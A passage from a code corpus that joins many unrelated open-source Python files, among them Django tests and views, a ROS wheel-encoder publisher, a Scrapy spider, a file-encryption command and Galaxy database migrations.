bool
True if interrupted, false otherwise.
"""
return self._interupted_event.is_set()
def tick(self, board: Board) -> 'State':
"""Check whether any of the attached transitions should be taken. If yes, return the next state it should go to
Parameters
----------
board : Board
Blackboard holding the value passed around.
Returns
-------
State
The next state if should go, self is returned if no transition should be taken.
"""
# check all the transitions
for transition in self._transitions:
if transition[0](self, board):
self.interrupt(timeout=None)
# start the next state
transition[1].start(board, self.flow_out)
return transition[1] # return the state to the execution
return self
def print_debugging_info(self) -> None:
"""Print Debug Information such as name and status of state.
"""
print(f" state name:{self._name} --- {self._status}")
if self._internal_exception is not None:
print(f"INTERNAL EXCEPTION {type(self._internal_exception)}")
print(''.join(traceback.TracebackException.from_exception(
self._internal_exception).format()))
def get_debug_info(self) -> typing.Dict[str, typing.Any]:
return {
'name': self._name,
'type': type(self).__name__,
'status': self._status
}
def get_debug_name(self) -> str:
""" Return the name and type of state. Helps with debugging.
Returns:
str: Name and Type of State.
"""
return f"{self._name}({self.__class__.__name__})"
def pre_execute(self):
self._state_last_start_time = time.time()
def post_execute(self):
self._state_last_end_time = time.time()
pass
| StarcoderdataPython |
3319294 | <reponame>fiaasco/php7<filename>molecule/ubuntu/tests/test_php7_bionic.py<gh_stars>0
import os
import pytest
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('php7-ubuntu-bionic')
@pytest.mark.parametrize('pkg', ['php7.2-fpm',
'php7.2-common',
'php7.2-cli',
'php7.2-curl',
'php7.2-dev',
'php7.2-gd',
'php7.2-mysql',
'php7.2-mbstring',
'php7.2-intl',
'php7.2-json',
'php7.2-soap',
'php7.2-xml',
'php7.2-xmlrpc',
'php7.2-zip',
'php-imagick',
'php-pear',
'php7.2-bcmath',
])
def test_default_packages(host, pkg):
""" check if packages are installed
"""
assert host.package(pkg).is_installed
def test_service(host):
""" check if service is running
"""
assert host.service('php7.2-fpm').is_enabled
assert host.service('php7.2-fpm').is_running
| StarcoderdataPython |
3343786 | <reponame>andrejchikilev/django-stored-messages<filename>stored_messages/tests/test_restapi.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from unittest import skipUnless
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from stored_messages.constants import STORED_ERROR
from .base import BackendBaseTest
try:
import rest_framework # noqa
rest_framework_installed = True
except ImportError:
rest_framework_installed = False
@skipUnless(rest_framework_installed, "Django restframework is not installed")
class TestRESTApi(BackendBaseTest):
def test_list(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 2)
self.assertEqual(messages[0]['message'], 'an error ☢')
self.assertEqual(messages[1]['message'], 'an error ☢')
self.assertEqual(messages[0]['level'], STORED_ERROR)
self.assertEqual(messages[1]['level'], STORED_ERROR)
def test_retrieve(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
id = messages[0]['id']
r = self.client.get(reverse('stored_messages:inbox-detail', kwargs={'pk': id}))
message = json.loads(r.content.decode('utf-8'))
self.assertEqual(message['message'], 'an error ☢')
self.assertEqual(message['id'], id)
def test_make_read(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 1)
msg_id = messages[0]['id']
r = self.client.post(reverse('stored_messages:inbox-read', args=(msg_id,)))
self.assertEqual(r.status_code, 200)
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 0)
def test_anon(self):
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 0)
def test_mark_all_read(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
r = self.client.post(reverse('stored_messages:mark_all_read'))
self.assertEqual(r.status_code, 200)
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 0)
@skipUnless(rest_framework_installed, "Django restframework is not installed")
@override_settings(STORED_MESSAGES={'STORAGE_BACKEND': 'stored_messages.backends.RedisBackend'})
class TestRESTApiWithRedis(TestRESTApi):
pass
| StarcoderdataPython |
1686852 | <reponame>guru-narayana/autonomous-car-SLAM-and-ROS-Navigation-
#! /usr/bin/python
from RPi import GPIO
import signal
import rospy
from geometry_msgs.msg import Twist
clk1 = 13 #left wheel
dt1 = 6
clk2 = 19 #right Wheel
dt2 = 26
def keyboardInterruptHandler(signal, frame):
print("this is velocity publisher signing off ...")
exit(0)
GPIO.setmode(GPIO.BCM)
GPIO.setup(clk1, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(dt1, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(clk2, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(dt2, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
pub = rospy.Publisher("g_cmd_vel",Twist,queue_size = 10)
rospy.init_node("encoders_data")
vel = Twist()
vel.linear.x = 0
vel.linear.y = 0
vel.linear.z = 0
vel.angular.x = 0
vel.angular.y = 0
vel.angular.z = 0
previous_time_l = rospy.get_time()
previous_time_r = rospy.get_time()
left_vel = 0
right_vel = 0
left_dist = 0
right_dist = 0
dl = 0
dr = 0
left_dist_prev = 0
right_dist_prev = 0
clkLastState1 = GPIO.input(clk1)
clkLastState2 = GPIO.input(clk2)
try:
while True:
clkState1 = GPIO.input(clk1)
clkState2 = GPIO.input(clk2)
dtState1= GPIO.input(dt1)
dtState2= GPIO.input(dt2)
present_time = rospy.get_time()
dtl = (present_time - previous_time_l)
dtr = (present_time - previous_time_r)
if clkState1 != clkLastState1:
if dtState1 != clkState1:
left_dist+= 0.0055
else:
left_dist+= -0.0055
if clkState2 != clkLastState2:
if dtState2 != clkState2:
right_dist+= 0.0055
else:
right_dist+= -0.0055
dl = left_dist-left_dist_prev
dr = right_dist-right_dist_prev
if abs(dtl) > 0.1 and abs(dtr) > 0.1:
left_vel = (left_dist-left_dist_prev)/dtl
left_dist_prev = left_dist
previous_time_l = present_time
right_vel = (right_dist-right_dist_prev)/dtr
right_dist_prev = right_dist
previous_time_r = present_time
clkLastState1 = clkState1
clkLastState2 = clkState2
vel.linear.x = (left_vel + right_vel)/2
vel.angular.z = (right_vel - left_vel)/(0.195)
vel.linear.x = round(vel.linear.x ,2)
vel.angular.z = round(vel.angular.z,2)
pub.publish(vel)
rospy.loginfo(vel)
signal.signal(signal.SIGINT, keyboardInterruptHandler)
finally:
GPIO.cleanup()
| StarcoderdataPython |
1702297 | <reponame>letaylor/limix
# Copyright(c) 2014, The LIMIX developers (<NAME>, <NAME>, <NAME>)
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import sys
sys.path.append('./../../release.darwin/interfaces/python')
import limix
import scipy as SP
import pdb
import time
import scipy.linalg as linalg
def PCA(Y, components):
"""run PCA, retrieving the first (components) principle components
return [s0, eig, w0]
s0: factors
w0: weights
"""
sv = linalg.svd(Y, full_matrices=0);
[s0, w0] = [sv[0][:, 0:components], SP.dot(SP.diag(sv[1]), sv[2]).T[:, 0:components]]
v = s0.std(axis=0)
s0 /= v;
w0 *= v;
return [s0, w0]
SP.random.seed(1)
#1. simulate data from a linear PCA model
N = 100
K = 5
D = 100
SP.random.seed(1)
S = SP.random.randn(N,K)
W = SP.random.randn(D,K)
Y = SP.dot(W,S.T).T
Y+= 0.1*SP.random.randn(N,D)
X0 = SP.random.randn(N,K)
X0 = PCA(Y,K)[0]
#starting params
covar_params = SP.array([1.0])
lik_params = SP.array([0.1])
#GPMIX:
covar = limix.CCovLinearISO(K)
ll = limix.CLikNormalIso()
#create hyperparm
hyperparams = limix.CGPHyperParams()
hyperparams['covar'] = covar_params
hyperparams['lik'] = lik_params
hyperparams['X'] = X0
#cretae GP
gp=limix.CGPbase(covar,ll)
#set data
gp.setY(Y)
gp.setX(X0)
lml0 = gp.LML(hyperparams)
dlml0 = gp.LMLgrad(hyperparams)
#optimization
lml0 = gp.LML()
dlml0 = gp.LMLgrad(hyperparams)
gpopt = limix.CGPopt(gp)
t2 = time.time()
gpopt.opt()
t3 = time.time()
| StarcoderdataPython |
1628736 | <reponame>rennerocha/pybr14-scrapy-tutorial<gh_stars>1-10
import scrapy
class MyFirstSpider(scrapy.Spider):
name = 'my-first-spider'
def start_requests(self):
urls = [
'http://quotes.toscrape.com/page/1/',
'http://quotes.toscrape.com/page/2/',
]
requests = []
for url in urls:
requests.append(
scrapy.Request(url=url, callback=self.parse))
return requests
def parse(self, response):
self.logger.info('Just parsing {}'.format(response.url))
| StarcoderdataPython |
3354304 | import copy
import contextlib
import StringIO
import unittest
from view import viewfile
def _make_simple_entry(name, branch='master', revision='HEAD'):
return viewfile.ViewFileEntry(name, 'git://{0}/{0}'.format(name), 'GIT',
branch, revision)
class TestViewFileEntryMethods(unittest.TestCase):
def test_has_revision(self):
unversioned_entry = _make_simple_entry('foo')
versioned_entry = _make_simple_entry(
'foo',
revision='7783ac32d05162f328bba0d64e56b80a9f15bb17')
self.assertFalse(unversioned_entry.has_revision())
self.assertTrue(versioned_entry.has_revision())
def test_eq(self):
self.assertTrue(_make_simple_entry('foo') == _make_simple_entry('foo'))
self.assertFalse(_make_simple_entry('foo') == _make_simple_entry('bar'))
class TestViewFileMethods(unittest.TestCase):
def test_dump(self):
view = viewfile.ViewFile()
view.entries.append(_make_simple_entry('foo'))
with contextlib.closing(StringIO.StringIO()) as f:
view.dump(f)
contents = f.getvalue()
self.assertEqual(contents,
'foo git://foo/foo GIT master HEAD\n')
def test_eq(self):
foo1 = viewfile.ViewFile([_make_simple_entry('foo')])
foo2 = viewfile.ViewFile([_make_simple_entry('foo')])
bar = viewfile.ViewFile([_make_simple_entry('bar')])
self.assertTrue(foo1 == foo2)
self.assertFalse(foo1 == bar)
class TestViewFileParse(unittest.TestCase):
def test_valid(self):
contents = \
'''
# Comments and whitespace only lines should be ignored
foo git://foo/foo GIT master HEAD
'''
with contextlib.closing(StringIO.StringIO(contents)) as f:
view = viewfile.parse(f)
expected = viewfile.ViewFile([_make_simple_entry('foo')])
self.assertEqual(view, expected)
def test_invalid(self):
invalid_views = [
'foo git://foo/foo GIT master',
'foo git://foo/foo GIT master HEAD extra'
]
for s in invalid_views:
with contextlib.closing(StringIO.StringIO(s)) as f:
with self.assertRaises(viewfile.ParseError):
viewfile.parse(f)
class TestViewFileDiff(unittest.TestCase):
def setUp(self):
self.foo_entry = _make_simple_entry('foo')
self.bar_entry = _make_simple_entry('bar')
self.foo_dev_entry = _make_simple_entry('foo', branch='dev')
self.empty_view = viewfile.ViewFile()
self.foo_view = viewfile.ViewFile([copy.copy(self.foo_entry)])
self.bar_view = viewfile.ViewFile([copy.copy(self.bar_entry)])
self.foobar_view = viewfile.ViewFile([copy.copy(self.foo_entry),
copy.copy(self.bar_entry)])
self.foo_dev_view = viewfile.ViewFile([copy.copy(self.foo_dev_entry)])
def test_no_changes(self):
diff = viewfile.diff(self.empty_view, self.empty_view)
self.assertEqual(diff, {})
diff = viewfile.diff(self.foo_view, self.foo_view)
self.assertEqual(diff, {})
def test_added(self):
diff = viewfile.diff(self.empty_view, self.foo_view)
self.assertEqual(diff, {'foo': (None, self.foo_entry)})
diff = viewfile.diff(self.empty_view, self.foobar_view)
self.assertEqual(diff, {'bar': (None, self.bar_entry),
'foo': (None, self.foo_entry)})
diff = viewfile.diff(self.foo_view, self.foobar_view)
self.assertEqual(diff, {'bar': (None, self.bar_entry)})
def test_removed(self):
diff = viewfile.diff(self.foo_view, self.empty_view)
self.assertEqual(diff, {'foo': (self.foo_entry, None)})
diff = viewfile.diff(self.foobar_view, self.empty_view)
self.assertEqual(diff, {'bar': (self.bar_entry, None),
'foo': (self.foo_entry, None)})
diff = viewfile.diff(self.foobar_view, self.foo_view)
self.assertEqual(diff, {'bar': (self.bar_entry, None)})
def test_changed(self):
diff = viewfile.diff(self.foo_view, self.foo_dev_view)
self.assertEqual(diff, {'foo': (self.foo_entry, self.foo_dev_entry)})
def test_complex(self):
diff = viewfile.diff(self.foobar_view, self.foo_dev_view)
self.assertEqual(diff, {'foo': (self.foo_entry, self.foo_dev_entry),
'bar': (self.bar_entry, None)})
| StarcoderdataPython |
1639321 | __version__ = "0.12.17.5"
| StarcoderdataPython |
1689956 | <reponame>hayj/MachineLearning
import numpy as np
from operator import itemgetter
def softmax_mean_rank(y_true, y_pred):
"""
This function calcute the mean rank of the true category
A score near to 1 means the model always predict a good softmax
Near to 0.5 --> random softmax...
"""
scores = []
for i in range(len(y_true)):
t = y_true[i]
p = y_pred[i]
position = np.where(t == 1)[0][0]
p = [(x, u) for u, x in enumerate(p)]
p = sorted(p, key=itemgetter(0), reverse=True)
rank = 0
u = 0
for current in p:
if current[1] == position:
rank = u
break
u += 1
score = rank / (len(p) - 1)
scores.append(score)
return 1.0 - np.mean(scores)
if __name__ == '__main__':
print(softmax_mean_rank\
(
np.array(
[
[0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
]),
np.array(
[
[0.1, 0.1, 0.1, 0.1, 0.6, 0.8, 0.1],
[0.1, 0.3, 0.1, 0.1, 0.6, 0.4, 0.1],
[0.1, 0.5, 0.0, 0.1, 0.6, 0.4, 0.9],
])
))
print(softmax_mean_rank\
(
np.array(
[
[0, 0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
]),
np.array(
[
[0.1, 0.1, 0.1, 0.1, 0.6, 0.8, 0.1],
[0.1, 0.3, 0.1, 0.1, 0.6, 0.4, 0.1],
[0.1, 0.5, 0.0, 0.1, 0.6, 0.4, 0.9],
])
))
print(softmax_mean_rank\
(
np.array(
[
[0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
]),
np.array(
[
[0.1, 0.1, 0.1, 0.1, 0.6, 0.8, 0.1],
[0.1, 0.3, 0.1, 0.1, 0.6, 0.4, 0.1],
[0.1, 0.5, 0.0, 0.1, 0.6, 0.4, 0.9],
])
)) | StarcoderdataPython |
119732 | from django.shortcuts import render
from django.http import HttpResponse
from apps.inverted import main, main2, main3
# Create your views here.
# def index(request):
# return HttpResponse("Hello, world. You're at the polls index.")
def home(request):
return render(request, 'apps/home.html')
def index(request):
return render(request, 'apps/index.html')
def index2(request):
return render(request, 'apps/index2.html')
def index3(request):
return render(request, 'apps/index3.html')
def lyric(request,id):
text, judul = main.detail(id)
content={
'no': id,
'judul':judul,
'text':text
}
return render(request, 'apps/lyric.html', content)
def lyric2(request, id):
text,judul = main2.detail(id)
content={
'no': id,
'judul':judul,
'text':text
}
return render(request, 'apps/lyric2.html', content)
def lyric3(request, id):
text,judul = main3.detail(id)
content={
'no': id,
'judul':judul,
'text':text
}
return render(request, 'apps/lyric3.html', content)
def result2(request):
#%%
# proximity_index = collections.OrderedDict(sorted(proximity_index.items()))
# for key, value in proximity_index.items():
# # print (key, value)
if request.method == 'POST':
query = request.POST['querysearch']
hasil = main2.main(query)
content={
'hasil':hasil,
'query':query
}
return render(request, 'apps/result2.html',content)
def result3(request):
#%%
# proximity_index = collections.OrderedDict(sorted(proximity_index.items()))
# for key, value in proximity_index.items():
# # print (key, value)
if request.method == 'POST':
query = request.POST['querysearch']
hasil = main3.main(query)
content={
'hasil':hasil,
'query':query
}
return render(request, 'apps/result3.html',content)
def result(request):
#%%
# proximity_index = collections.OrderedDict(sorted(proximity_index.items()))
# for key, value in proximity_index.items():
# # print (key, value)
if request.method == 'POST':
query = request.POST['querysearch']
hasil= main.main(query)
content={
'hasil':hasil,
'query':query
}
return render(request, 'apps/result.html',content)
| StarcoderdataPython |
3234696 |
class LinkedList:
def __init__(self):
self.head = self.get_sentinal()
self.tail = self.get_sentinal()
self.head.next = self.tail
def get_sentinal(self):
return Node(None, None, None)
class Node:
def __init__(self, prev, data, next):
self.prev = prev
self.data = data
self.next = next
| StarcoderdataPython |
4825880 | class Card:
def __init__(self,suit,face):
self.suit = int(suit)
self.face = int(face)
def cardSuit(self):
if self.suit == 0:
return "SPADES"
elif self.suit == 1:
return "HEARTS"
elif self.suit == 2:
return "CLUBS"
elif self.suit == 3:
return "DIAMONDS"
def cardWorth(self):
if self.face == 0:
return 11
elif self.face < 10:
return self.face + 1
else:
return 10
def cardFace(self):
if self.face == 0:
return "ACE"
elif self.face > 0 and self.face < 10:
return self.face + 1
elif self.face == 10:
return "JACK"
elif self.face == 11:
return "QUEEN"
elif self.face == 12:
return "KING"
def printCard(self):
print(str(self.cardFace()) + " OF " + self.cardSuit())
def __str__(self):
return str(self.cardFace()) + " OF " + self.cardSuit()
def __repr__(self):
return self.__str__()
| StarcoderdataPython |
34609 | from unittest import TestCase
import os
class TestSet_up_logger(TestCase):
def test_set_up_logger(self):
from utils import set_up_logger
from logging import Logger
logger = set_up_logger("test", "test.log")
self.assertIsInstance(logger, Logger)
os.remove("test.log")
| StarcoderdataPython |
117395 | <reponame>Akash16s/youtube-video-fetch-api
# Generated by Django 3.0.5 on 2020-04-29 06:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('apiCall', '0003_youtubemodel'),
]
operations = [
migrations.AlterField(
model_name='youtubemodel',
name='thumbnail_url',
field=models.TextField(),
),
]
| StarcoderdataPython |
4836177 | <filename>django/contrib/localflavor/de/forms.py
"""
DE-specific Form helpers
"""
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
import re
id_re = re.compile(r"^(?P<residence>\d{10})(?P<origin>\w{1,3})[-\ ]?(?P<birthday>\d{7})[-\ ]?(?P<validity>\d{7})[-\ ]?(?P<checksum>\d{1})$")
class DEZipCodeField(RegexField):
default_error_messages = {
'invalid': _('Enter a zip code in the format XXXXX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(DEZipCodeField, self).__init__(r'^\d{5}$',
max_length, min_length, *args, **kwargs)
class DEStateSelect(Select):
"""
A Select widget that uses a list of DE states as its choices.
"""
def __init__(self, attrs=None):
from de_states import STATE_CHOICES
super(DEStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
class DEIdentityCardNumberField(Field):
"""
A German identity card number.
Checks the following rules to determine whether the number is valid:
* Conforms to the XXXXXXXXXXX-XXXXXXX-XXXXXXX-X format.
* No group consists entirely of zeroes.
* Included checksums match calculated checksums
Algorithm is documented at http://de.wikipedia.org/wiki/Personalausweis
"""
default_error_messages = {
'invalid': _('Enter a valid German identity card number in XXXXXXXXXXX-XXXXXXX-XXXXXXX-X format.'),
}
def has_valid_checksum(self, number):
given_number, given_checksum = number[:-1], number[-1]
calculated_checksum = 0
fragment = ""
parameter = 7
for i in range(len(given_number)):
fragment = str(int(given_number[i]) * parameter)
if fragment.isalnum():
calculated_checksum += int(fragment[-1])
if parameter == 1:
parameter = 7
elif parameter == 3:
parameter = 1
elif parameter ==7:
parameter = 3
return str(calculated_checksum)[-1] == given_checksum
def clean(self, value):
super(DEIdentityCardNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
match = re.match(id_re, value)
if not match:
raise ValidationError(self.error_messages['invalid'])
gd = match.groupdict()
residence, origin = gd['residence'], gd['origin']
birthday, validity, checksum = gd['birthday'], gd['validity'], gd['checksum']
if residence == '0000000000' or birthday == '0000000' or validity == '0000000':
raise ValidationError(self.error_messages['invalid'])
all_digits = u"%s%s%s%s" % (residence, birthday, validity, checksum)
if not self.has_valid_checksum(residence) or not self.has_valid_checksum(birthday) or \
not self.has_valid_checksum(validity) or not self.has_valid_checksum(all_digits):
raise ValidationError(self.error_messages['invalid'])
return u'%s%s-%s-%s-%s' % (residence, origin, birthday, validity, checksum)
| StarcoderdataPython |
3325631 | """
Encrypt files in the raw-private folder to raw-private-encrypted
"""
import logging
import sys
from argparse import Namespace
from getpass import getpass
from pathlib import Path
from typing import Optional, Iterable
from compendium.command.command import CompendiumCommand
from compendium.compendium import Compendium
from compendium.encryption import encrypt_file, verify_file, get_key
class Encrypt(CompendiumCommand):
"""Encrypt files from private-raw to private-raw-encrypted"""
@classmethod
def add_arguments(cls, parser):
parser.add_argument("files", nargs="*",
help="Specify the files to be encryped (default=all private files)")
parser.add_argument("--password",
help="Specify the password")
parser.add_argument("--verify", action="store_true",
help="Test whether all files are correctly encrypted with this password")
@classmethod
def do_run(cls, compendium: Compendium, args: Namespace):
def _l(f: Path) -> Path:
return f.relative_to(compendium.root)
if args.verify:
for file in compendium.folders.DATA_ENCRYPTED.glob("*"):
infile = compendium.folders.DATA_PRIVATE/file.name
if not infile.exists():
logging.warning(f"WARNING: Encrypted file {_l(file)} "
f"has no corresponding file in {_l(compendium.PRIVATE)}")
files = list(get_files(compendium.folders.DATA_PRIVATE, args.files))
if not files:
print("No files to encrypt, exiting", file=sys.stderr)
sys.exit(1)
if not args.password:
args.password = getpass("Please specify the password to use: ").strip()
if not args.password:
print("No password given, aborting", file=sys.stderr)
sys.exit(1)
if not compendium.folders.DATA_ENCRYPTED.exists():
logging.debug(f"Creating {compendium.folders.DATA_ENCRYPTED}")
compendium.folders.DATA_ENCRYPTED.mkdir()
key = get_key(compendium.salt, args.password)
action = 'Encrypting' if not args.verify else 'Verifying'
logging.info(f"{action} {len(files)} file(s) from {_l(compendium.folders.DATA_PRIVATE)}")
for file in files:
outfile = compendium.folders.DATA_ENCRYPTED/file.name
if args.verify:
logging.debug(f".. {_l(outfile)} -> {_l(file)}?")
if not outfile.exists():
print(f"WARNING: File {_l(outfile)} does not exist")
elif not verify_file(key, file, outfile):
print(f"WARNING: File {_l(file)} could not be decrypted from {_l(outfile)}", file=sys.stderr)
else:
logging.debug(f".. {file} -> {outfile}")
encrypt_file(key, file, outfile)
def get_files(folder: Path, files: Optional[Iterable[str]]):
if not files:
yield from folder.glob("*")
else:
for file in files:
if file.startswith("/"): # absolute path
file = Path(file)
elif "/" in file: # relative wrt current folder
file = Path.cwd()/file
else: # relative wrt private data folder
file = folder/file
if file.parent != folder:
raise Exception(f"Cannot encrypt {file}, not in {folder}")
yield file | StarcoderdataPython |
9529 | <filename>lib/galaxy/model/migrate/versions/0026_cloud_tables.py
"""
This script adds tables needed for Galaxy cloud functionality.
"""
from __future__ import print_function
import datetime
import logging
from sqlalchemy import Boolean, Column, DateTime, ForeignKey, Integer, MetaData, Table, TEXT
now = datetime.datetime.utcnow
log = logging.getLogger( __name__ )
metadata = MetaData()
CloudImage_table = Table( "cloud_image", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "provider_type", TEXT ),
Column( "image_id", TEXT, nullable=False ),
Column( "manifest", TEXT ),
Column( "state", TEXT ),
Column( "architecture", TEXT ),
Column( "deleted", Boolean, default=False ) )
""" UserConfiguredInstance (UCI) table """
UCI_table = Table( "cloud_uci", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "credentials_id", Integer, ForeignKey( "cloud_user_credentials.id" ), index=True ),
Column( "key_pair_name", TEXT ),
Column( "key_pair_material", TEXT ),
Column( "name", TEXT ),
Column( "state", TEXT ),
Column( "error", TEXT ),
Column( "total_size", Integer ),
Column( "launch_time", DateTime ),
Column( "deleted", Boolean, default=False ) )
CloudInstance_table = Table( "cloud_instance", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "launch_time", DateTime ),
Column( "stop_time", DateTime ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "uci_id", Integer, ForeignKey( "cloud_uci.id" ), index=True ),
Column( "type", TEXT ),
Column( "reservation_id", TEXT ),
Column( "instance_id", TEXT ),
Column( "mi_id", Integer, ForeignKey( "cloud_image.id" ), index=True ),
Column( "state", TEXT ),
Column( "error", TEXT ),
Column( "public_dns", TEXT ),
Column( "private_dns", TEXT ),
Column( "security_group", TEXT ),
Column( "availability_zone", TEXT ) )
CloudStore_table = Table( "cloud_store", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "attach_time", DateTime ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "uci_id", Integer, ForeignKey( "cloud_uci.id" ), index=True, nullable=False ),
Column( "volume_id", TEXT ),
Column( "size", Integer, nullable=False ),
Column( "availability_zone", TEXT ),
Column( "inst_id", Integer, ForeignKey( "cloud_instance.id" ) ),
Column( "status", TEXT ),
Column( "device", TEXT ),
Column( "space_consumed", Integer ),
Column( "error", TEXT ),
Column( "deleted", Boolean, default=False ) )
CloudSnapshot_table = Table( "cloud_snapshot", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "uci_id", Integer, ForeignKey( "cloud_uci.id" ), index=True ),
Column( "store_id", Integer, ForeignKey( "cloud_store.id" ), index=True, nullable=False ),
Column( "snapshot_id", TEXT ),
Column( "status", TEXT ),
Column( "description", TEXT ),
Column( "error", TEXT ),
Column( "deleted", Boolean, default=False ) )
CloudUserCredentials_table = Table( "cloud_user_credentials", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "provider_id", Integer, ForeignKey( "cloud_provider.id" ), index=True, nullable=False ),
Column( "name", TEXT ),
Column( "access_key", TEXT ),
Column( "secret_key", TEXT ),
Column( "deleted", Boolean, default=False ) )
CloudProvider_table = Table( "cloud_provider", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "user_id", Integer, ForeignKey( "galaxy_user.id" ), index=True, nullable=False ),
Column( "type", TEXT, nullable=False ),
Column( "name", TEXT ),
Column( "region_connection", TEXT ),
Column( "region_name", TEXT ),
Column( "region_endpoint", TEXT ),
Column( "is_secure", Boolean ),
Column( "host", TEXT ),
Column( "port", Integer ),
Column( "proxy", TEXT ),
Column( "proxy_port", TEXT ),
Column( "proxy_user", TEXT ),
Column( "proxy_pass", TEXT ),
Column( "debug", Integer ),
Column( "https_connection_factory", TEXT ),
Column( "path", TEXT ),
Column( "deleted", Boolean, default=False ) )
def upgrade(migrate_engine):
metadata.bind = migrate_engine
print(__doc__)
# Load existing tables
metadata.reflect()
try:
CloudProvider_table.create()
CloudUserCredentials_table.create()
CloudImage_table.create()
UCI_table.create()
CloudInstance_table.create()
CloudStore_table.create()
CloudSnapshot_table.create()
except Exception:
log.exception("Creating cloud tables failed.")
def downgrade(migrate_engine):
metadata.bind = migrate_engine
metadata.reflect()
try:
CloudSnapshot_table.drop()
CloudStore_table.drop()
CloudInstance_table.drop()
UCI_table.drop()
CloudImage_table.drop()
CloudUserCredentials_table.drop()
CloudProvider_table.drop()
except Exception:
log.exception("Dropping cloud tables failed.")
| StarcoderdataPython |
37387 |
def create_supervised_data(env, agents, num_runs=50):
val = []
# the data threeple
action_history = []
predict_history = []
mental_history = []
character_history = []
episode_history = []
traj_history = []
grids = []
ep_length = env.maxtime
filler = env.get_filler()
obs = env.reset(setting=setting, num_visible=num_goals)
for ep in tqdm.tqdm(range(num_runs*eps_per_run)):
buffer_s = [np.zeros(obs[0].shape) for _ in range(env.maxtime)]
if (ep % eps_per_run) == eps_per_run-1:
obs = env.reset(setting=setting, num_visible=num_goals)
else:
obs = env.reset()
if ep % eps_per_run == 0:
episode_number = 0
#clear ep_history here?
for agent in agents:
if not unarbitrary_prefs:
agent.reset_prefs()
else:
agent.hardcode_prefs()
prevact = None
prevpos = None
agentpos = agents[0].pos
episode_time = 0
while not env.done:
if rendering and ((ep % eps_per_run) == eps_per_run-1):
env.render()
buffer_s.append(obs[0])
actions = [agent.action(torch.FloatTensor([buffer_s[-env.maxtime:]]).cuda()),]
agentpos = agents[0].pos
thistraj = env.get_trajectory(agentpos, prevact, prevpos)
prevpos = agentpos
#without agent position, thisact of none is pretty meaningless
prevact = actions[0]
traj_history += [thistraj, ]
#moved this to before following if
episode_time += 1
if ((ep % eps_per_run) == eps_per_run-1):
# each step in last episode
#episode number is 3
if visualize:
render_path(env, ep, episode_time, vispath)
#print(actions)
run = np.zeros((eps_per_run, ep_length, *filler.shape))
if eps_per_run > 1:
run[-episode_number-1:-1] = episode_history[-episode_number:]
episode = np.zeros((ep_length, *filler.shape))
episode[ep_length-episode_time:] = traj_history[-episode_time]
run[-1] = episode
